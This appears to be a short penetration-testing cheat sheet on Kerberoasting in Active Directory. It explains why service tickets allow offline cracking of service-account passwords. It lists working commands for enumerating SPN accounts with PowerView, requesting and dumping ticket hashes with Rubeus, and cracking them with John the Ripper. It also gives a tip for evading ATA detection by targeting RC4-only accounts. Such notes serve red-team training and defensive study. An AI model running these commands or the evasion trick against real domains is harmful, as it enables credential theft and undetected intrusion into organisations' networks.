- Offline cracking of service account passwords.
- The Kerberos session ticket (TGS) has a server portion which is encrypted with the password hash of service account. This makes it possible to request a ticket and do offline password attack.
- Because (non-machine) service account passwords are not frequently changed, this has become a very popular attack!
Find user accounts used as Service accounts
Get-DomainUser -SPN | select samaccountname

- Use Rubeus to request a TGS
Rubeus.exe kerberoast /user:svcadmin /simple

- To avoid detections based on Encryption Downgrade for Kerberos EType (used by likes of
ATA - 0x17 stands for rc4-hmac), look for Kerberoastable accounts that only support
RC4_HMAC
Rubeus.exe kerberoast /stats /rc4opsec
Rubeus.exe kerberoast /user:svcadmin /simple /rc4opsec
- Kerberoast all possible accounts
Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt
Crack ticket using John the Ripper
john.exe --wordlist=<WordList> <Path_hash.txt>
